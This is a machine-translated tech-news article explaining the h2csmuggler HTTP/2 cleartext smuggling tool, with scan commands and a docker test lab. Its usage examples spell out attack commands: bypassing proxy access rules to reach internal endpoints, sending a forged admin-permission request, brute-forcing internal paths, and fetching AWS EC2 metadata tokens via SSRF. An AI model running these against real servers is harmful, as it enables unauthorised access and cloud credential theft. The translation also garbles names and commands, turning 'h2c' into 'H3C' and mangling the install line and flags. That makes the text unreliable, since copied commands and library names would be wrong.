Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to use the highly hidden HTTP2 plaintext communication tool h2csmuggler. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

Tool introduction

H3csmuggler is a highly hidden HTTP/2 plaintext communication tool that uses H3C compatible back-end servers to establish HTTP/2 plaintext (H3C) communications and hides HTTP traffic through insecure edge server proxy_pass configuration:

How to test?

The tool is applicable to any proxy terminal node that can forward H3C update Header. Because H3C itself is supposed to be executed only on the plaintext communication channel, the detection in the HTTPs service will generally report a true positive result.

In contrast, HTTP services are likely to produce false positive results. For example, an H3C-enabled agent might respond directly to the update Header instead of forwarding it to an H3C backend.

Researchers can use the-- scan-list option to test one or more Web servers to find affected proxy_pass endpoints. It is recommended that you use a directory list for directory enumeration, such as the following URL text file (urls.txt):

Https://www.example.com/https://www.example.com/api/https://www.example.com/auth/https://www.example.com/admin/https://www.example.com/payments/...omitted for brevity... The following command will scan the urls.txt using h3cSmuggler and define the number of scanning threads:. / h3csmuggler.py-- scan-list urls.txt-- threads 5 or, you can scan a single node directly using the following command:. / h3csmuggler.py-x https://www.example.com/api/-- test tool

Once we have identified an affected node, we can use it for information transmission. Now we can access or explode the internal terminal node of a back-end server and then provide custom statements or Header. In the following example, we will demonstrate how to use the data hiding feature of H3C to bypass the agent reject rule and access the internal / flag endpoint.

Tool dependence

The only dependent component of the tool is the Python hyper-h3 library, which is installed as follows:

Pip3 install H3 test environment and Demo

This test environment will allow us to test using h3cSmuggler in a controlled environment. Docer-compose will simulate three agents pointing to the H3C-enabled Golang back-end server:

TCP port: Description= = 8000: HTTP H3C backend8001: HAProxy-> H3C backend (Insecure default configuration) 8002: nginx-> H3C backend (Insecure custom configuration) 8003: Nuster-> HAProxy-> H3C backend (Insecure configuration with multiple layers of proxies)

We can generate the certificate and bind it to the docker-compose environment using the following command:

# Generate certs./configs/generate-certificates.sh # Activate servicesdocker-compose up

Next, we try to access those prohibited end nodes through the HAProxy server (port 8001):

We can use the-test (or-t) option of h3cSmuggler to confirm the insecure configuration of the agent:

Now that we use h3cSmuggler to perform an H3C update, we transfer our HTTP/2 traffic through the agent, then request access to the / flag node from the back-end server and bypass the agent's access control:

Tool use

H3cSmuggler uses curl-like statements to process requests:

Usage: h3csmuggler.py [- h] [--scan-list SCAN_LIST] [--threads THREADS] [--upgrade-only] [- x PROXY] [- I WORDLIST] [- X REQUEST] [- d DATA] [- H HEADER] [- m MAX_TIME] [- t] [- v] [url] Detect and exploit insecure forwarding of H3C upgrades. Positional arguments: url optional arguments:-h,-- help show this help message and exit-- scan-list SCAN_LIST list of URLs for scanning-- threads THREADS # of threads (for use with-- scan-list)-- upgrade-only drop HTTP2-Settings from outgoing Connection header-x PROXY,-- proxy PROXY proxy server to try to bypass-I WORDLIST -- wordlist WORDLIST list of paths to bruteforce-X REQUEST,-- request REQUEST smuggled verb-d DATA,-- data DATA smuggled data-H HEADER,-- header HEADER smuggled headers-m MAX_TIME,-- max-time MAX_TIME socket timeout in seconds (type: float Default 10)-t,-- test test a single proxy server-v,-- sample use of verbose tool

1. Scan the URL address list to identify the affected end nodes:

. / h3csmuggler.py-- scan-list urls.txt-- threads 5

Alternatively, redirect the data results to the target file:

. / h3csmuggler.py-- scan-list urls.txt-- threads 52 > errors.txt 1 > results.txt

2. Send a special POST request to bypass the edge server and reach the internal node:

. / h3csmuggler.py-x https://edgeserver-X POST-d'{"user": 128457 "role": "admin"}'- H "Content-Type: application/json"-H "X-SYSTEM-USER: true" http://backend/api/internal/user/permissions

3. Use HTTP/2 multiplexing to explode internal nodes:

/ h3csmuggler.py-x https://edgeserver-I dirs.txt http://localhost/

4. Use Host Header SSRF to obtain tokens:

. / h3csmuggler.py-x https://edgeserver-X PUT-H "X-aws-ec2-metadata-token-ttl-seconds: 21600" http://169.254.169.254/latest/api/token`

Send token:

. / h3csmuggler.py-x https://edgeserver-H "x-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/

5. Use X-Forwarded-For Header to deceive the IP address and access the internal node dashboard:

/ h3csmuggler.py-x https://edgeserver-H "X-Forwarded-For: 127.0.0.1"-H "X-Real-IP: 172.16.0.1" http://backend/system/dashboard the above is how the highly hidden HTTP2 plaintext communication tool h2csmuggler is used, if you happen to have similar doubts, please refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.